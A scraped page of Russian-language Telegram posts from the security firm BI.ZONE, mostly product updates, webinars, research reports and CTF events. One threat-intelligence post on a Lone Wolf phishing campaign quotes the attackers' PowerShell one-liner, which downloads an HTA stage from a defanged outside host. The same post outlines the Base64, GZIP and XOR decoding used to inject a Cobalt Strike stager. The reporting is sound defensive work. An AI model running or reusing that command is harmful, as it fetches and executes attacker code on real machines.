Мир сегодня с "Юрий Подоляка"
Мир сегодня с "Юрий Подоляка"
Труха⚡️Україна
Труха⚡️Україна
Николаевский Ванёк
Николаевский Ванёк
Мир сегодня с "Юрий Подоляка"
Мир сегодня с "Юрий Подоляка"
Труха⚡️Україна
Труха⚡️Україна
Николаевский Ванёк
Николаевский Ванёк
BI.ZONE avatar
BI.ZONE
BI.ZONE avatar
BI.ZONE
23.04.202513:19
⚡️ Выложили запись вебинара «BI.ZONE EDR: на шаг впереди инцидента»

Рассказали, какие функции появились у решения за последнее время и как они помогут укрепить защиту конечных точек. 

Из видео вы узнаете о новых возможностях сбора телеметрии, мониторинга и автоматического реагирования. 

Смотреть запись
🔍 Самые популярные и необычные способы пивотинга

Чтобы проникнуть в важные сегменты, злоумышленники могут прибегать к пивотингу. Эта техника позволяет использовать скомпрометированное устройство для дальнейшего проникновения в сеть.

В новой статье мы рассказали:

🔵как работает пивотинг,
🔵какие методы встречались в 2024 году чаще всего,
🔵какие необычные способы скоро могут стать популярными.

➡️Читать статью
11.04.202513:02
▶️ Что важно знать об identity security

Делимся конспектом и записью эфира AM Live, где эксперты обсудили:

🔵задачи, которые решает identity security,
🔵типичные ошибки при внедрении,
🔵ключевые векторы развития в ближайшие 1–2 года.

Будет полезно всем, кто отвечает за архитектуру доступа, IAM, PAM, киберзащиту и управление учетными записями.

Читать конспект и смотреть видео
11.03.202509:34
🌜 Разобрали до кварков: вышла запись эфира «Киберразведка решает все»

В студии AM Live поговорили о threat intelligence. Эксперты разобрали, как киберразведданные помогают компаниям выявлять угрозы на ранней стадии и предупреждать атаки до того, как они нанесут ущерб. А также обсудили, как правильно:

🟦применять киберразведданные,
🟦выстроить непрерывный процесс киберразведки,
🟦внедрить актуальные подходы к сбору данных и управлению процессами. 

Смотреть запись

Читать обзор эфира

А еще напоминаем, что недавно вышло обновление BI.ZONE Threat Intelligence. С новым инструментом «Теневые ресурсы» компаниям будет проще предсказывать кибератаки и минимизировать последствия утечек.
06.02.202512:06
💡 Пять наиболее распространенных веб-угроз в 2024 году

Команда BI.ZONE WAF проанализировала веб-атаки за прошедший год и выделила самые популярные из них.

1. RCE-атаки
Их доля составила 36% от общего числа веб-угроз.

У атаки с удаленным исполнением кода самые опасные последствия: злоумышленник может полностью захватить контроль над сервером веб-приложения.

2. Разведывательные атаки 
Сюда относятся нелегитимные запросы от утилит, которые автоматизированно ищут слабые места в коде.

По сравнению с первой половиной года доля таких атак выросла втрое — с 6,8% до 22%. А по итогам года она составила 16%. Рост может быть связан с распространением инструментов на базе ИИ и машинного обучения. 

3. Попытки получить доступ к файлам конфигурации, логам сервера
Один из примеров — атака обхода пути (path traversal).

На подобные угрозы пришлось 16%. Они чаще всего фиксировались в запросах к ресурсам транспортных и логистических компаний (73% от всех атак).

4. Атаки, направленные на кражу данных посетителей сайта 
Среди них межсайтовый скриптинг, расщепление HTTP‑запроса, загрязнение прототипа и т. д.

По итогам года доля таких атак составила 14%. Чаще всего с ними сталкивались государственные организации (66%), телекоммуникационные компании (37%) и образовательные учреждения (30%).

5. Попытки получить доступ к базе данных
Самый известный пример — SQL-инъекции.

Доля подобных атак — 10% от общего числа веб-угроз. В 2024 году они были чаще всего нацелены на организации в сфере ритейла (26%) и финансов (11%).

Подробнее читайте на сайте.
23.04.202511:41
🌝 Атаки с дорогими последствиями и защита за пределами веб-приложений

Наши эксперты выступили на CISO FORUM 2025 с докладами об актуальных угрозах и ошибочных подходах к безопасности.

Смотрите видео выступлений:

🔵Дешевые атаки с дорогими последствиями

Почему атаковать стало проще, какие инструменты используют злоумышленники и как бизнесу защититься от самых доступных способов вторжения.

🔵За пределами веба. Комплексная защита инфраструктуры от DDoS-атак

Как выглядит современная DDoS-атака, что остается незамеченным за периметром веб-приложений и зачем проводить регулярные стресс-тесты инфраструктуры.

В фокусе обоих докладов — реальные риски для бизнеса, кейсы, а также подходы, которые мы используем на практике.
🚀 Еще больше возможностей для управления распределенной сетью

В новой версии BI.ZONE Secure SD-WAN мы повысили отказоустойчивость сетевой инфраструктуры и добавили полезные функции для распределенных компаний.

Что появилось:

🔵8 одновременно работающих интернет-каналов (NxWAN) вместо 2

Это повышает отказоустойчивость и дает больше гибкости при масштабировании.

🔵Географическое резервирование контроллеров

Их можно развернуть в разных локациях, но подключены они будут к одной инфраструктуре. При сбое основного контроллера система автоматически переключается на резервный.

🔵Кластер из двух сетевых устройств

Если одно устройство выходит из строя, второе продолжает работу. Это значимо для критически важных сервисов.

Обновление особенно актуально для организаций с высокими требованиями к доступности: банков, компаний из сфер здравоохранения, промышленности, телекома.

Подробнее
Пераслаў з:
OFFZONE avatar
OFFZONE
08.04.202515:05
⚡️ Всё о нашем CFP

Совсем скоро мы откроем наш традиционный call for papers. Каждый год нас спрашивают, как стать спикером на нашей конференции, и задают еще кучу вопросов.

Как работает прием заявок? Почему мой доклад не приняли и что с этим делать? А мерч за выступление дадите? Дадим :) А какой? И так далее.

Чтобы call for papers был для вас более прозрачным, подробно рассказали о нем на «Хабре».

А еще на нашем сайте есть FAQ, где собраны ответы на все вопросы про OFFZONE.
⚡️ Сбер внедрил BI.ZОNE PAM

Вместо зарубежной системы по управлению привилегированным доступом Сбер внедрил отечественное решение BI.ZONE PAM.

Благодаря ему тысячам IT-специалистов Сбера станет удобнее работать с критическими системами.

Вот что получила компания:

🟦Контроль прав привилегированных пользователей, мониторинг их активности и передача данных в SIEM.

🟦Масштабирование инсталляции на всю цифровую инфраструктуру.

🟦Меньше действий DevOps-, SRE-инженеров и администраторов для подключения сразу к множеству объектов инфраструктуры.

Наши эксперты помогли Сберу составить дорожную карту с учетом потребностей компании, что сделало внедрение BI.ZONE PAM поэтапным и бесшовным.

Подробнее о сотрудничестве
😈😈😈😈😈😈😈😈

Российский ландшафт киберугроз на 187 страницах

Мы работали над этим весь прошлый год. Представляем Threat Zone 2025 — исследование киберландшафта России и СНГ.

Что вы найдете в материале:

🔵Профили группировок.
🔵Особенности ландшафта киберугроз.
🔵Список самых атакуемых отраслей.
🔵Популярные методы получения первоначального доступа.
🔵Топ-10 техник злоумышленников.

Исследование поможет вам ориентироваться в динамике угроз, понимать мотивацию злоумышленников и их подходы.

И смотрите видео с презентацией материала в посте.

Скачать бесплатно
04.02.202511:29
🚀 Большое обновление BI.ZONE PAM

Фокус версии 2.0 — улучшение пользовательского опыта.

Администраторам BI.ZONE PAM теперь удобнее управлять привилегированным доступом, а пользователям — безопасно работать с серверами и другими критическими IT-ресурсами.

Вот что появилось в версии 2.0:

🟦Кеширование второго фактора аутентификации при подключении через протоколы SSH и RDP.

🟦Поддержка Ansible playbook — популярного инструмента автоматизации DevOps-задач.

🟦Новые возможности работы с записями сессий.

🟦Расширенный интерфейс управления пользователями, секретами, конфигурацией решения, в том числе максимально гибкая настройка ролевой модели.

Подробнее об обновлении
23.04.202509:03
💼 BI.ZONE GRC на CISO FORUM 2025: как мы строим киберзащиту для крупных компаний

На CISO FORUM 2025 мы пообщались с Андреем Быковым, руководителем BI.ZONE GRC.

Он рассказал:

🟦Почему управление IT-активами — основа защиты бизнеса.
🟦Как автоматизировать процессы кибербезопасности в крупных холдингах.
🟦Как наш клиент за 2,5 года кратно вырастил уровень зрелости безопасности в группе из 200+ компаний.

➡️Смотреть интервью

Вы можете запросить бесплатное демо BI.ZONE GRC, чтобы оценить решение на практике.
🌕 Как Watch Wolf атакует российский бизнес

На фоне громких кибератак на крупные компании деятельность небольших группировок заметна меньше. Но она тоже наносит серьезный ущерб.

Одна из таких — кластер Watch Wolf в таксономии BI.ZONE Threat Intelligence, также известный как Buhtrap. Участники этой группировки атакуют преимущественно средний и малый бизнес.

Мы уже рассказывали об одном из инцидентов, а теперь делимся полноценным исследованием кластера от команды BI.ZONE DFIR.

Что внутри:

🔵Подробное описание жизненного цикла атак.
🔵Известные кампании.
🔵Используемые инструменты.
🔵Меры защиты от злоумышленников.

➡️Скачать исследование
🌝 Эффективная логика обнаружения угроз в SOC

Детектирующая логика — основа мониторинга и реагирования на киберугрозы. К ней относится любой контент, позволяющий выявлять атаки:

🔵правила корреляции в SIEM-системе,
🔵сигнатуры NTA,
🔵правила обнаружения EDR,
🔵YARA-правила и т. д.

За семь лет работы нашего SOC мы собрали большую базу контента. Используем ее не только в BI.ZONE TDR, но и для того, чтобы помогать другим компаниям строить свой собственный центр мониторинга.

В статье, посвященной детектирующей логике, рассказали:

🟦про этапы разработки контента,
🟦формирование идей и гипотез,
🟦критерии эффективности правил.

Читать статью
06.02.202512:06
🌜 Разбираем самое интересное из Threat Zone 2025

13 февраля в 11:00 проведем онлайн-презентацию нового исследования.

Расскажем:

🔵Что появилось в арсенале кластеров активности, нацеленных на российские организации.
🔵Какие особенности в атаках на компании наблюдают специалисты киберразведки.
🔵Как изменилась мотивация злоумышленников.

А еще ответим на вопросы об исследовании киберугроз. Пишите их в специальном поле при регистрации на мероприятие.

Среди авторов самых интересных вопросов разыграем печатные экземпляры исследования и другие призы!

Ведущие:

🟦Олег Скулкин, руководитель BI.ZОNE Threat Intelligence.
🟦Дмитрий Купин, руководитель отдела исследования киберугроз и вредоносного кода, BI.ZОNE Threat Intelligence.

Зарегистрироваться
05.02.202515:14
⭐️ Сколько микроГоферов в одной килострочке кода на Go?

Мы не знаем :) 

Но знаем, что у нашего CTF-кружка вышла новая серия лекций. На этот раз разбираем по полочкам язык Go.

Вот записи всех четырех уроков: 

1. Язык Go: знакомство.
2. Язык Go: еще больше конструкций.
3. Язык Go: memory.
4. Язык Go: asynchronous programming.

Впереди еще много интересных тем, не переключайтесь!
🔧 Прокачиваемся в безопасной разработке веб-приложений

Наш с CyberED курс «Основы безопасной разработки» практический и охватывает основные темы, после каждого урока есть тесты и задания. Обучение включает 71 академический час материала и разбито на 5 модулей.

Рассказываем, что ваши сотрудники получат в результате прохождения каждого:

🔷Модуль 0
Познакомятся с основными понятиями кибербезопасности, а также фреймворками и методологиями безопасной разработки.

🔷Модуль 1
Изучат уязвимости веб‑приложений, их классификацию, причины возникновения и способы митигации.

🔷Модуль 2
Рассмотрят функции безопасности, включая протоколы HTTP, SSL/TLS, PKI, сессии, механизмы аутентификации и авторизации, взаимодействия с СУБД, а также особенности их реализации.

🔷Модуль 3
Научатся обеспечивать безопасность Docker, Kubernetes, окружения приложений и хранения информации, грамотно настраивать элементы приложений, использовать Ansible и CIS Benchmark, Nginx, работать с HashiCorp Vault.

🔷Модуль 4
Познакомятся с практиками SSDLC на всех этапах разработки.

Посмотреть всю программу и бесплатный демоурок
🌛 CVE-2025-24364 и CVE-2025-24365: анализируем уязвимости в Vaultwarden

По данным BI.ZONE TDR, в 2025 году Vaultwarden использует каждая десятая российская компания.

Поскольку секреты от других внутренних сервисов хранятся в Vaultwarden, при его взломе атакующий узнает и их. А если продукт автоматически получает секреты с помощью API, злоумышленник попадет на хост с обширной сетевой связностью.

Наша группа исследования уязвимостей проанализировала Vaultwarden. В результате мы обнаружили две уязвимости высокого уровня опасности: CVE-2025-24364 и CVE-2025-24365.

В статье разобрали, как устроены эти уязвимости, и дали рекомендации, как избежать их эксплуатации.
21.04.202508:56
▶️ Делимся записью эфира «Коммерческий или гибридный SOC?»

В недавнем эфире AM Live эксперты разобрали:

🔵в чем плюсы и минусы разных подходов к обеспечению мониторинга и реагирования;
🔵как оценить эффективность гибридного и коммерческого SOC и различаются ли критерии;
🔵на что обратить внимание при переходе от одной модели к другой.

Видео будет полезно тем, кто строит либо развивает SOC, думает о смене модели или просто хочет свериться с лучшими практиками.

➡️Смотреть запись

Если у вас уже есть собственный SOC, пройдите наше бесплатное тестирование по оценке зрелости. После прохождения вы получите рекомендации, что и как можно улучшить.
🦴 Вы задолжали Lone Wolf: атакующие рассылают загрузчик Cobalt Strike под видом документов о финансовой задолженности

С начала марта злоумышленники из Lone Wolf реализовали несколько фишинговых кампаний.

Письма с темой «Актуальная задолженность(просроченная)» рассылались в российские логистические, производственные, финансовые организации и компании из сферы розничной торговли. К письму был прикреплен запароленный архив «выписка.zip». 

Интересно, что для обхода автоматизированных средств защиты, умеющих «подставлять» пароль из тела письма для сканирования вложений, злоумышленники использовали фразу «пароль к архиву одна единица».

Внутри архива — ярлык Windows «Выписка.lnk». При его открытии жертвой происходила компрометация системы, а на устройство загружался Cobalt Strike Stager в следующей последовательности: 

1. PowerShell-скрипт, содержащийся в LNK-файле, загружал HTA-файл по ссылке zetag[.]ru/z[.]hta.

powershell .(gp -pa 'HKLM:\SOF*\Clas*\Applications\msh*e').('PSChildName')http://zetag[.]ru/z.hta

2. Файл z.hta, содержащий закодированный с помощью Base64 и запакованный утилитой GZIP PowerShell-скрипт, декодировал еще одну стадию — снова PowerShell-скрипт. 

3. Шелл-код с экземпляром Cobalt Strike Stager декодировался сначала с помощью Base64, потом путем операции XOR с ключом 0x35 и внедрялся в адресное пространство процесса PowerShell. 

Полученный доступ к корпоративным сетям злоумышленники использовали для распространения программ-вымогателей.
06.02.202512:06
05.02.202509:11
🔒 Введите пароль: qwerty1234

По нашим данным, в 2024 году каждый третий высококритичный киберинцидент в российских компаниях был связан с компрометацией паролей от учетных записей администраторов.

Топ самых распространенных паролей, которые команда BI.ZONE Brand Protection обнаружила в утечках за последние полгода:

🟦123456
🟦123456789
🟦test1
🟦admin

Чтобы создать сильный пароль, советуем использовать парольные фразы, например uLUKd3_Zcndt («У лукоморья дуб зеленый, златая цепь на дубе том»). А хранить такие сложные комбинации лучше в парольных менеджерах.

Другие способы создать надежный пароль — в статье на CISOCLUB.

Если вы хотите узнать, есть ли в вашей организации утекшие пароли, BI.ZONE Brand Protection покажет все скомпрометированные учетные записи. Это позволит превентивно сменить доступы и избежать возможных инцидентов.
10.12.202415:14
🚀 Делимся программой BI.ZONE x MEPhI CTF Meetup #3

Мы давно не говорили про CTF, очень соскучились по сообществу и хорошим докладам. Поэтому подготовили по-настоящему легендарный состав спикеров и тем. 

Вот какие доклады вас ждут:

🔵Бинари на AD. Взгляд разработчика и игрока
Георгий Кигурадзе, старший специалист по безопасности приложений, «Лаборатория Касперского»

🔵Hitchhiker's guide to Browser Exploitation
Теодор-Арсений Ларионов-Тришкин, независимый эксперт, участник команды Drovosec

🔵CTF в России
Виктор Минин, председатель правления АРСИБ

🔵А минимальное знание вашего OWASP позволяет мне писать бездырные приложения
Елизар Батин, старший специалист по исследованию уязвимостей, BI.ZONE

🔵Трассировщики, которые я знал и любил
Тимофей Мищенко, инженер по безопасности, Wildberries

До митапа осталась всего неделя. Вы еще успеваете зарегистрироваться. Ждем вас!

P. S. Количество мест ограничено.
Паказана 1 - 24 з 24
Увайдзіце, каб разблакаваць больш функцый.